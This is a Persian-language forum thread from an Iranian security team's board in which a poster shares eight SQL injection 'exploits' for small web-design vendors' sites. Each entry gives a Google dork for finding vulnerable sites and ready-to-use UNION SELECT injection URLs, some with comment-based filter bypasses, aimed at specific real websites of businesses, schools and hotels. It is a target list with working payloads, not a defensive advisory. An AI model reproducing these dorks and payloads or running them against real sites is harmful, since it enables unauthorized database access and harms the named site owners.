رفتن به مطلب
انجمن تیم امنیتی گارد ایران

ارسال های توصیه شده

با سلام خدمت دوستان .

در این تاپیک اکسپلویت های sql injection رو میزارم برای دوستانی که به اسیب پذیری sql injection علاقمند هستند . 

 

Exploit 1 Web Mingo I.T. Solutions - SQL Injection vulnerability

*********************************************************
#Exploit Title: Web Mingo I.T. Solutions - SQL Injection vulnerability
#Date: 2020-11-10
#Google Dork: "Design & Developed By Web Mingo I.T. Solutions"
#Category:webapps
#Tested On: windows 10, Firefox
 
Proof of Concept:
Search google Dork: "Design & Developed By Web Mingo I.T. Solutions"

Demo :
https://signoelevators.com/product-range.php?id=-561%27%20union%20select%201,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17--+

https://www.raceias.com/news-details.php?id=-6%27%20union%20select%201,version(),3,4,5,6,7,8,9--+

https://taekwondofederationofindia.com/news-detail.php?id=-1%27%20union%20select%201,2,3,4,version(),6,7--+

 

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

Exploit 2 Designed by Launch Web Dreams - SQL Injection vulnerability

#Exploit Title: Designed by Launch Web Dreams - SQL Injection vulnerability
#Date: 2020-11-07
#Google Dork: "Designed by Launch Web Dreams"
#Category:webapps
#Tested On: windows 10, Firefox
 
Proof of Concept:
Search google Dork: "Designed by Launch Web Dreams"

Demo :
http://summerbreeze.in/products.php?id=-1%20/*!12345union*/%20select%2011111,22222,33333,version(),55555,66666,77777,88888--&Type=Men

https://sreejaigroups.com/fashion.php?id=-6%20/*!12345UNION*/%20SELECT%201111,2222,3333,4444,version(),6666,7777,8888,9999--&Type=Mask

* Results are displayed in the source

 

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

Exploit 3 Design & Develop by shopweb - SQL Injection vulnerability

*********************************************************
#Exploit Title: Design & Develop by shopweb - SQL Injection vulnerability
#Date: 2020-11-07
#Google Dork: "Design & Develop by shopweb"
#Category:webapps
#Tested On: windows 10, Firefox
 
Proof of Concept:
Search google Dork: "Design & Develop by shopweb"

Demo :
http://www.anishmotors.com/services.php?op_id=-7%27%20/*!12345union*/%20select%201,version(),3,4,5,6,7--+

http://lldiaries.com/fashion.php?id=-26%27%20UNION%20SELECT%201,2,3,version(),5,6,7,8,9,10,11--+
لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

Exploit 4 Powered by : HindSoft Technology - SQL Injection vulnerability

#Exploit Title: Powered by : HindSoft Technology - SQL Injection vulnerability
#Date: 2020-11-05
#Google Dork: "Powered by : HindSoft Technology"
#Category:webapps
#Tested On: windows 10, Firefox
 
Proof of Concept:
Search google Dork: "Powered by : HindSoft Technology"

Demo :
http://gdgoenkakarkardooma.com/NewsDetail.php?Id=-130%27%20union%20select%201,2,3,version(),5,6,7,8,9,10--+&LnToken=HsDU83QgvgM2kdc396dc30cc82458af93e7fa4b6523a8

http://www.gdgoenkasonepat.com/NewsDetail.php?Id=-8%27%20union%20select%201,2,3,version(),5,6,7,8,9,10--+&LnToken=HsoXI7.5jB8bg3701c6221be71ff26d726d376aa1dc9

http://gitarattan.com/NewsDetail.php?Id=-6%27%20union%20select%201,2,3,4,version(),6,7,8,9,10--+&LnToken=Hs0.a7JpkkK1271cc7d40774098936e8a8dd4872654fa
لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

Exploit 5 econtactopuro - SQL Injection vulnerability

*********************************************************
#Exploit Title: contactopuro - SQL Injection vulnerability
#Date: 2020-11-02
#Vendor Homepage : http://www.contactopuro.com
#Category:webapps
#Tested On: windows 10, Firefox
 

Demo :
https://www.columbiapalacehotel.com.ar/en/hotel.php?id=-1%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,version(),21,22,23,24,25,26,27--

http://www.contactopuro.com/trabajo.php?id=-62%20UNION%20SELECT%201,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--

 

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

Exploit 6 : Powered by Shambhala.Travel - SQL Injection vulnerability

#Exploit Title: Powered by Shambhala.Travel - SQL Injection vulnerability
#Date: 2020-10-21
#Google Dork: "Powered by Shambhala.Travel"
#Category:webapps
#Tested On: windows 10, Firefox
 
Proof of Concept:
Search google Dork: "Powered by Shambhala.Travel"

Demo :
https://www.longtailboatphiphi.com/tours-detail.php?id=-70%27%20UNION%20SELECT%201,2,VERSION(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--+

https://www.triptophuket.com/tour_detail.php?id=-57%20UNION%20SELECT%201,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56--

https://www.tmttravelphuket.com/tour.php?id=-4%27%20UNION%20SELECT%201,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--+
لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

Exploit 7 : Designed By : WEBSYS - SQL Injection vulnerability

#Exploit Title: Designed By : WEBSYS - SQL Injection vulnerability
#Date: 2020-10-11
#Google Dork: "Designed By : WEBSYS"
#Category:webapps
#Tested On: windows 10, Firefox
 
Proof of Concept:
Search google Dork: "Designed By : WEBSYS"

Demo :
http://www.alliedicd.com/index.php?page_id=-41%27%20/*!12345union*/%20select%201,2,3,version(),5,6,7,8,9--+
https://www.justlookonline.in/product-details-new.php?id=-215%27%20/*!12345union*/%20select%201,2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16--+
لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

Exploit : 8 :  Webworx Technologies - SQL Injection vulnerability

*********************************************************
#Exploit Title: Webworx Technologies - SQL Injection vulnerability
#Date: 2020-10-10
#Google Dork: "Website Developed By: Webworx Technologies"
#Category:webapps
#Tested On: windows 10, Firefox
 
Proof of Concept:
Search google Dork: "Website Developed By: Webworx Technologies"

Demo :
http://www.peacecenter.org.pk/detail.php?ContentID=-94%20union%20select%201,2,version(),4,5--
http://adventurefoundation.org.pk/news_detail.php?NewsID=-68%20union%20select%201,2,version(),4,5,6,7,8--
http://www.msk.com.pk/company.php?ConCatID=-3%20union%20select%201,2,version(),4,5,6--

 

 

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری
 اشتراک گذاری

انجمن تیم امنیتی گارد ایران

تیم امنیتی گارد ایران یک گروه مستقل است که قوانین آن با خط مشی جمهوری اسلامی ایران مغایرت ندارد. تیم امنیتی گارد ایران از سال 1393 فعالیت خود را آغاز کرد و هدف این تیم تامین امنیت سایت ها و سرورهای ایرانی است. تیم ما همیشه برای دفاع از مرزهای سایبری سرزمین عزیزمان ایران آماده است.

شبکه های اجتماعی

×
×
  • اضافه کردن...